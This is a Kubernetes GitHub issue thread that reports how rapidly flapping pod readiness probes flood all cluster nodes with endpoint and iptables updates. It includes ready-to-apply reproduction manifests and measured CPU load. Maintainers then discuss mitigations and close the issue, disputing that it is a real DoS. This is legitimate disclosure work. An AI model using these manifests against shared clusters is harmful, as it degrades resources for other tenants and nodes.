
Pod status changes on one worker node can be leveraged to make a flooding attack on all other nodes in the Kubernetes cluster #110596

Closed
younaman opened this issue Jun 15, 2022 · 20 comments
Labels
  • kind/bug: Categorizes issue or PR as related to a bug.
  • lifecycle/stale: Denotes an issue or PR has remained open with no activity and has become stale.
  • sig/network: Categorizes an issue or PR as relevant to SIG Network.
  • sig/security: Categorizes an issue or PR as relevant to SIG Security.
  • triage/accepted: Indicates an issue or PR is ready to be actively worked on.

Comments

@younaman

What happened?

In a Kubernetes cluster, every node runs a kube-proxy and a kubelet. Kube-proxy watches Service/Endpoints changes reported by the API server and updates the local iptables rules; the kubelet reports status changes of local pods to the kube-apiserver.

So when the status of a pod that backs a Service/Endpoints changes on a worker node, that node's kubelet reports the change to the kube-apiserver on the control plane. When the kube-apiserver receives the status change, it updates the related Endpoints object in etcd and pushes the change to the kube-proxy on every other node, and each of those kube-proxies then rewrites its local iptables rules.

As a result, a malicious user's service can keep changing the status of its pods, causing the kube-apiserver to push endpoint changes to all other nodes and making processes on those nodes (iptables, calico, etc.) consume CPU and memory resources, i.e. a flooding attack.
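
A minimal way to observe this propagation channel (a sketch; it assumes kubectl access to the cluster, the nginx-test namespace used in the reproduction below, and kube-proxy in iptables mode):

# Watch Endpoints churn caused by readiness flapping (run from any machine with cluster access).
kubectl get endpoints -n nginx-test -w

# On another worker node, watch kube-proxy rewriting its KUBE-SVC-* chains.
watch -n 1 'iptables-save | grep -c KUBE-SVC'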

What did you expect to happen?

We reported a similar DoS issue to the Kubernetes program on HackerOne; however, HackerOne said that "all Denial-of-Service findings are out-of-scope". So I am filing the issue on GitHub, and I want to know:

  1. Is it a real issue?

  2. If it is a real issue, are there any ways to defend against this problem fundamentally?

  3. As far as I can tell, the problem is intrinsic to the kube-proxy design; if it is a real issue, does Kubernetes at least plan to mitigate it?

How can we reproduce it (as minimally and precisely as possible)?

  1. Deploy 10 malicious pods on one worker node, using a pod.yaml template like this:
apiVersion: v1
kind: Pod
metadata:
  name: test-readiness-1
  namespace: nginx-test
  labels:
    app: nginx-1
spec:
  nodeName: younaman-thinkpad
  containers:
  - name: nginx
    image: nginx
    args:
    - /bin/sh
    - -c
    - while true;do touch /tmp/healthy;sleep 1;rm -rf /tmp/healthy;sleep 1;done
    readinessProbe:
      exec:
        command:
        - cat
        - /tmp/healthy
      initialDelaySeconds: 1
      periodSeconds: 1
      failureThreshold: 1
      timeoutSeconds: 1
      successThreshold: 1
    imagePullPolicy: IfNotPresent
    ports:
    - containerPort: 80

These 10 pods are all pinned to the younaman-thinkpad worker node, and each toggles its ready status roughly every second.
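
To confirm that the readiness status is actually flapping (a sketch; it assumes the nginx-test namespace and the app: nginx-1 label from the manifest above):

# The READY column of the malicious pods should toggle between 0/1 and 1/1 roughly every second.
kubectl get pods -n nginx-test -l app=nginx-1 -w

# The failing readiness probes also show up as Unhealthy warning events.
kubectl get events -n nginx-test --field-selector reason=Unhealthy -w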
  2. Deploy one Deployment with 90 pods; these 90 pods and the 10 pods above all carry the label app: nginx-1.

apiVersion: apps/v1
kind: Deployment
metadata:
  namespace: nginx-test
  name: nginx-normal-deployment
spec:
  selector:
    matchLabels:
      app: nginx-1
  replicas: 90
  template:
    metadata:
      labels:
        app: nginx-1
    spec:
      nodeName: younaman-thinkpad
      restartPolicy: Always
      containers:
      - name: nginx
        image: nginx
        imagePullPolicy: IfNotPresent
        ports:
        - containerPort: 80
  3. Deploy 30 Services, each selecting the nginx-1 pod group; in other words, 30 Services are used to create 30 Endpoints objects.
apiVersion: v1
kind: Service
metadata:
  namespace: nginx-test
  name: nginx-service-1
spec:
  selector:
    app: nginx-1
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80

apiVersion: v1
kind: Service
metadata:
  namespace: nginx-test
  name: nginx-service-2
spec:
  selector:
    app: nginx-1
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80
...
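
The remaining Services differ only in their name; a small shell loop can generate all 30 of them (a sketch following the nginx-service-1 … nginx-service-30 naming pattern above):

for i in $(seq 1 30); do
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Service
metadata:
  namespace: nginx-test
  name: nginx-service-$i
spec:
  selector:
    app: nginx-1
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80
EOF
done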

On our local testbed (1 master, 2 worker nodes, each with a 4-core CPU and 8 GB of memory), doing this makes the api-server/etcd/calico processes on the control-plane node consume about 60% CPU, the calico/kube-proxy/iptables processes on the other worker nodes consume about 20% CPU, and the incoming network bandwidth on the other worker nodes reach about 1M/s. All of this amounts to a flooding attack.

Anything else we need to know?

No response

Kubernetes version

$ kubectl version
Client Version: version.Info{Major:"1", Minor:"21", GitVersion:"v1.21.1", GitCommit:"5e58841cce77d4bc13713ad2b91fa0d961e69192", GitTreeState:"clean", BuildDate:"2021-05-12T14:18:45Z", GoVersion:"go1.16.4", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"21", GitVersion:"v1.21.1", GitCommit:"5e58841cce77d4bc13713ad2b91fa0d961e69192", GitTreeState:"clean", BuildDate:"2021-05-12T14:12:29Z", GoVersion:"go1.16.4", Compiler:"gc", Platform:"linux/amd64"}

Cloud provider

OS version


Install tools

Container runtime (CRI) and version (if applicable)

Related plugins (CNI, CSI, ...) and versions (if applicable)

@younaman younaman added the kind/bug label Jun 15, 2022
@k8s-ci-robot k8s-ci-robot added the needs-sig and needs-triage labels Jun 15, 2022
@k8s-ci-robot
Contributor

@younaman: This issue is currently awaiting triage.

If a SIG or subproject determines this is a relevant issue, they will accept it by applying the triage/accepted label and provide further guidance.

The triage/accepted label can be added by org members by writing /triage accepted in a comment.

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

@younaman younaman changed the title from "Endpoints status changes on one worker node can make a flooding attack on all other nodes in the Kubernetes cluster" to "Pod status changes on one worker node can be leveraged to make a flooding attack on all other nodes in the Kubernetes cluster" Jun 15, 2022
@wangyysde
Member

/cc @wangyysde

@neolit123
Member

/sig security network

@k8s-ci-robot k8s-ci-robot added the sig/security and sig/network labels and removed the needs-sig label Jun 15, 2022
@younaman
Author

Knock knock! Are there any updates or comments?

@younaman
Author

@aojea @chrisohaver @neolit123 @pacoxu Are there any suggestions or comments about my questions? Looking forward to your reply :)

@younaman
Author

@wangyysde @aojea @chrisohaver @neolit123 @pacoxu It has been 5 days; are there any suggestions or comments about my questions? Looking forward to your reply :)

@chrisohaver
Contributor

I’m not knowledgeable enough on the subject to answer.

@younaman
Author

@chrisohaver Thanks for your reply! Since you are a Kubernetes contributor, do you know someone who could give me some comments? Looking forward to your reply!

@pacoxu
Member

pacoxu commented Jun 20, 2022

For security issues, I think you can submit it to https://hackerone.com/kubernetes/thanks?type=team.

For me, I think this is what we can do about it:

  • add a quota to limit Service creation (see the sketch after this list)
  • monitor pods that continuously restart or are recreated, and add an alert (pod backoff is a warning event, and many warning events should trigger an alert)
  • if this is a batch of short-term jobs with services/endpoints, the behavior may be expected. It depends.
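
As a rough sketch of the first suggestion, an object-count ResourceQuota can cap how many Services a namespace may create (the namespace name and the limit of 10 are placeholders, not values from this thread):

apiVersion: v1
kind: ResourceQuota
metadata:
  name: service-count-limit    # illustrative name
  namespace: nginx-test
spec:
  hard:
    services: "10"             # maximum number of Service objects allowed in this namespace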

@younaman
Author

@pacoxu I reported a similar DoS issue to hackerone.com; however, HackerOne told me that "DoS attacks are out of scope." Are you sure that my report will not get a similar "out of scope" response?

By the way, thanks for your mitigation suggestions! However, I want to know the answers to my questions:

  1. Is it a real issue?

  2. If it is a real issue, are there any ways to defend against this problem fundamentally?
    (You have already offered some mitigation suggestions; thank you again for that!)

  3. As far as I can tell, the problem is intrinsic to the kube-proxy design; if it is a real issue, does Kubernetes at least plan to mitigate it?

@pacoxu
Member

pacoxu commented Jun 20, 2022

I'm not sure. 😓

@thockin
Member

thockin commented Jun 22, 2022

It's hard to call this an "issue". We need to be able to fail readiness on pods and we need to be able to update the endpoints on every client (node) in a reasonably short time window. Otherwise we end up routing traffic to dead endpoints.

EndpointSlice was designed to mitigate some of the impact here, but ultimately the updates must flow.

kube-proxy has a rate-limited write to iptables, so it can only do that every so often (though looking at it, that default may be too low).

The best we could do would be to rate limit updates per namespace or something like that.

I'll leave this open to discuss, but it's not a super compelling option.
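
For reference, the rate limit mentioned above maps to the iptables sync settings in the kube-proxy configuration; a sketch with illustrative values (the numbers are placeholders, not recommendations made in this thread):

apiVersion: kubeproxy.config.k8s.io/v1alpha1
kind: KubeProxyConfiguration
iptables:
  syncPeriod: 30s       # how often a full resync of the rules is forced
  minSyncPeriod: 10s    # minimum delay between syncs triggered by Service/Endpoints changes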

@younaman
Author

@thockin Thanks for your comments and suggestions!

  1. I have read the official kube-proxy documentation. The minimum interval at which the iptables rules can be refreshed as endpoints and services change is 1s. In my attack I did not change the default interval, and it still produced a flooding effect on the other nodes. So it is at least a "problem", or a "configuration problem"; do you agree?

  2. By the way, in my opinion this problem is intrinsic to the kube-proxy design. The information channel leveraged by this flooding attack will exist as long as kube-proxy has to sync endpoint status to the other worker nodes, no matter how long the interval is.

  3. "The best we could do would be to rate limit updates per namespace or something like that." That is a good point! Perhaps the minimum interval could be set per namespace or per service? However, I am concerned that this potential solution may create unnecessary trouble for Kubernetes admins or namespace owners.

  4. Perhaps we could at least add a note or warning about the minimum interval to the official Kubernetes documentation? Most people may not realize the potential risk carried by the default interval configuration.

Looking forward to your reply!

@thockin thockin added the triage/accepted label and removed the needs-triage label Jun 23, 2022
@danwinship
Contributor

#110268 may help this by making each iptables-restore call much smaller

@thockin
Member

thockin commented Jun 23, 2022

It is a "problem" or so-called "configuration problem" at least, do you agree with my opinion?

The problem is, I think, that it's a purely static config. We could consider something more dynamic, like the holdoff period being proportional to how long the run took. If it takes 10 seconds to sync, we should probably hold off more than if it takes 0.3 seconds. I think. It could also be dynamic based on offender - we could consider "rare" events to be more urgent and "common" ones to be eligible for backoff. We could even get really smart and say "this particular endpoint seems to be flapping, so we leave it disabled longer". This is a significant change - it will require local decision making and caching and expiry.

It's not clear that this is justified, yet. I have not seen a lot of reports of this being a real problem in the wild. I'm in favor of considering options, but I haven't yet come up with one that is obviously right.

@younaman
Author

@thockin Thanks for your reply! It is a hard choice between flexibility and security :) Besides, please note my second point above: the information channel leveraged by this flooding attack will exist as long as kube-proxy has to sync endpoint status to the other worker nodes, no matter how long the interval is. Perhaps this problem is intrinsic to the kube-proxy design and there is no silver bullet that solves it fundamentally?

@k8s-triage-robot

The Kubernetes project currently lacks enough contributors to adequately respond to all issues and PRs.

This bot triages issues and PRs according to the following rules:

  • After 90d of inactivity, lifecycle/stale is applied
  • After 30d of inactivity since lifecycle/stale was applied, lifecycle/rotten is applied
  • After 30d of inactivity since lifecycle/rotten was applied, the issue is closed

You can:

  • Mark this issue or PR as fresh with /remove-lifecycle stale
  • Mark this issue or PR as rotten with /lifecycle rotten
  • Close this issue or PR with /close
  • Offer to help out with Issue Triage

Please send feedback to sig-contributor-experience at kubernetes/community.

/lifecycle stale

@k8s-ci-robot k8s-ci-robot added the lifecycle/stale label Sep 22, 2022
@khenidak
Contributor

To add: pod status update is a privileged API. Having said that, it is unlikely that a pod's status will change every second unless something presents itself to the api-server with kubelet-like privileges and patches the pod object in a tight loop. The kubelet (the upstream patching side), the api-server, and kube-proxy all run with rate limits that should prevent that.
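
For context, the kubelet-side rate limit mentioned here corresponds to the API client QPS/burst fields in the kubelet configuration; a sketch with illustrative values (the numbers are examples, not defaults asserted by this thread):

apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
kubeAPIQPS: 5      # illustrative cap on kubelet -> kube-apiserver request rate
kubeAPIBurst: 10   # illustrative burst allowance on top of the QPS cap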

@aojea
Member

aojea commented Sep 26, 2022

/close

there is no evidence of a DoS attack, just a way to generate more status changes and consume more resources

@k8s-ci-robot
Contributor

@aojea: Closing this issue.

In response to this:

/close

there is no evidence of a DoS attack, just a way to generate more status changes and consume more resources

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.
